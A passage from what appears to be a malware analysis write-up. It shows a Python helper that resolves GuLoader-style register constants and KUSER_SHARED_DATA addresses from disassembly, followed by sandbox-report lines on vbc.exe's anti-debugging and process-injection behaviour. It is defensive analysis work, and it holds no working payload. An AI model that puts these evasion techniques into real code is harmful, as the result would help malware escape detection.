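    Unknown inputs (cpuid/rdtsc outputs, popad, memory contents) poison the
    destination register instead of producing a wrong value."""
    regs = {}                      # register -> known 32-bit value
    events = []
    for line in listing.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        off, op, args = int(m.group(1), 16), m.group(2).lower(), m.group(3) or ""
        if op == "rdtsc":
            events.append((off, "rdtsc", None))
            regs.pop("eax", None)
            regs.pop("edx", None)
        elif op == "cpuid":
            events.append((off, "cpuid", regs.get("eax")))
            for r in ("eax", "ebx", "ecx", "edx"):
                regs.pop(r, None)
        elif op == "popad":
            regs.clear()
        elif op == "mov" or op in ARITH:
            parts = [p.strip() for p in args.split(",", 1)]
            if len(parts) != 2 or parts[0] not in REGS:
                continue
            dst, src = parts
            mem = MEM_RE.match(src)
            if mem:
                events.append((off, "deref", regs.get(mem.group(1))))
                regs.pop(dst, None)
                continue
            imm = IMM_RE.match(src)
            if imm:
                val = int(imm.group(1), 16)
            elif src in regs:
                val = regs[src]
            else:
                regs.pop(dst, None)
                continue
            if op == "mov":
                regs[dst] = val & MASK32
            elif dst in regs:
                regs[dst] = ARITH[op](regs[dst], val) & MASK32
    return events


def describe_address(addr):
    """Name the KUSER_SHARED_DATA field an absolute address falls in, else None."""
    if addr is None or not KUSER_SHARED_DATA <= addr < KUSER_SHARED_DATA + 0x1000:
        return None
    rel = addr - KUSER_SHARED_DATA
    base = max(o for o in KUSER_FIELDS if o <= rel)
    name = "KUSER_SHARED_DATA." + KUSER_FIELDS[base]
    return name if rel == base else f"{name}+0x{rel - base:x}"


if __name__ == "__main__":
    for off, kind, value in resolve_constants(RDTSC_SNIPPET):
        shown = "?" if value is None else hex(value)
        print(f"+0x{off:02x} {kind:6} {shown} {describe_address(value) or ''}")
```

The same resolver applies to the other xor-chained constants a GuLoader stage builds at run time; only immediates and registers it has already seen are trusted, so a chain that depends on a value the excerpt does not show reports None rather than a guess.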

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_002AF8DA rdtsc 4_2_002AF8DA
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_002AC054 mov eax, dword ptr fs:[00000030h] 4_2_002AC054
Source: C:\Users\Public\vbc.exe Code function: 4_2_002AE990 mov eax, dword ptr fs:[00000030h] 4_2_002AE990
Source: C:\Users\Public\vbc.exe Code function: 4_2_002A46A0 mov eax, dword ptr fs:[00000030h] 4_2_002A46A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B1BCE mov eax, dword ptr fs:[00000030h] 4_2_002B1BCE
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B474A RtlAddVectoredExceptionHandler, 4_2_002B474A

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmp Binary or memory string: Program Manager<